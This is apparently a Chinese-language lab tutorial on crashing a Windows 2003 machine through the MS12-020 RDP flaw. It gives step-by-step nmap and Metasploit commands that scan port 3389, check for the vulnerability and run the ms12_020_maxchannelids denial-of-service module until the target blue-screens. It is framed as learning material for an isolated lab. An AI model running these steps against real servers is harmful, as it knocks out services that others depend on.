利用Windows 系统漏洞MS12-020 进行攻击

Windows 系统漏洞MS12-020

漏洞介绍

MS12-020为windows下2012年爆出高危安全漏洞,该漏洞是因为Windows系统的远程桌面协议(RDP, Remote Desktop Protocol)存在缓存溢出漏洞,攻击者可通过向目标操作系统发送特定内容的RDP包造成操作系统蓝屏,利用起来操作简单,危害极大,影响范围极广。
(1) 产生条件
开启3389远程桌面;2012年漏洞披露后未更新系统补丁。
(2) 漏洞危害
服务器数据处理出错,导致服务器蓝屏,无法继续提供服务。

学习目标

了解存在MS12-020漏洞的基本条件;
熟悉Metasploit工具的使用;
了解MS12-020漏洞的危害。

所需工具

工具名称 功能描述
Nmap 网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。
Metasploit Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞产生的危害。

实验环境

两台虚拟机:kali(192.168.1.149),win2003(192.168.1.64,3389端口开启),
保证它们之间能够ping通。
利用Windows 系统漏洞MS12-020 进行攻击

实验步骤

步骤1.

通过kali环境内集成的工具nmap对目标192.168.1.64开放的服务端口及系统版本进行扫描,具体命令如下:
nmap -sS 192.168.1.64 -p 3389
利用Windows 系统漏洞MS12-020 进行攻击
这里显示端口关闭,我们需要手动打开3389端口,转到win2003。
在我的电脑 > 属性 > 远程 ,里面勾选远程桌面。
利用Windows 系统漏洞MS12-020 进行攻击
在命令行中输入:netstat -an 可以看到2289端口已打开。
利用Windows 系统漏洞MS12-020 进行攻击
在kali中可以看到open
利用Windows 系统漏洞MS12-020 进行攻击
【参数解释】
① -sS 是指隐秘的TCP Syn扫描。
② -p用于扫描指定端口。
发现192.168.1.64开放远程桌面3389端口,该服务在12年时被批露出存在溢出漏洞,可利用metasploit进行检测和利用。

步骤2.

在kali环境内使用msfconsole启动Metasploit漏洞利用工具。
利用Windows 系统漏洞MS12-020 进行攻击

步骤三.

在metasploit内输入search ms12-020搜索ms12-020相关的模块,由于metasploit集成的攻击模块较多,查询起来需等待大约两分钟时间。
利用Windows 系统漏洞MS12-020 进行攻击

步骤四.

得到的结果有两个,每个代表不同的作用,其中ms12_020_maxchannelids 是进行攻击的模块;ms12_020_check 是进行漏洞扫描的模块。如果进行批量攻击,可以先进行扫描后进行攻击。使用use auxiliary/scanner/rdp/ms12_020_check加载扫描模块。
加载ms12_020_check模块后,使用show options 列出使用该模块需要配置的参数选项。

use auxiliary/scanner/rdp/ms12_020_check

show options
利用Windows 系统漏洞MS12-020 进行攻击

步骤五.

通过上图可以看到,使用ms12_020_check模块,需要配置RHOSTS、RPORT、THREADS三个参数,其中RHOSTS是目标主机,可以是单个ip地址,也可以是ip段。THREADS 是线程,我们可以设置多线程来加快扫描速度。RPORT 是端口,默认是3389。THREADS为扫描过程中的进程数量,默认是1,如果在确定IP地址的情况下,只设置RHOSTS参数即可。设置目标地址为192.168.1.64,命令格式如下:

set RHOSTS 192.168.1.64

设置完相关参数后,使用exploit或者run 开始检测。
利用Windows 系统漏洞MS12-020 进行攻击

步骤六.

上图的扫描结果显示ip为192.168.1.64的主机存在这个漏洞。可以对这台机子进行攻击。使用use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
加载攻击模块。使用show options查看使用该模块需要配置的相关参数。
利用Windows 系统漏洞MS12-020 进行攻击

步骤七.

通过上图可以看到,利用ms12-020攻击模块需要配置RHOSTS、RPORT参数,其中RPORT默认是3389,所以,在目标主机未改变远程桌面端口的情况下,只设置目标地址即可。设置目标主机IP地址的命令格式如下:

set RHOSTS 192.168.1.64

show options
利用Windows 系统漏洞MS12-020 进行攻击

步骤八.

设置完ms12-020攻击模块所需参数后,使用exploit或者run开始攻击。
利用Windows 系统漏洞MS12-020 进行攻击

步骤九.

192.168.1.64:3389 seems down显示攻击成功,目标操作系统已经宕机,服务器端进行查看,可看到服务器已经蓝屏。
利用Windows 系统漏洞MS12-020 进行攻击

本教程仅供学习使用,不得用于非法用途!!!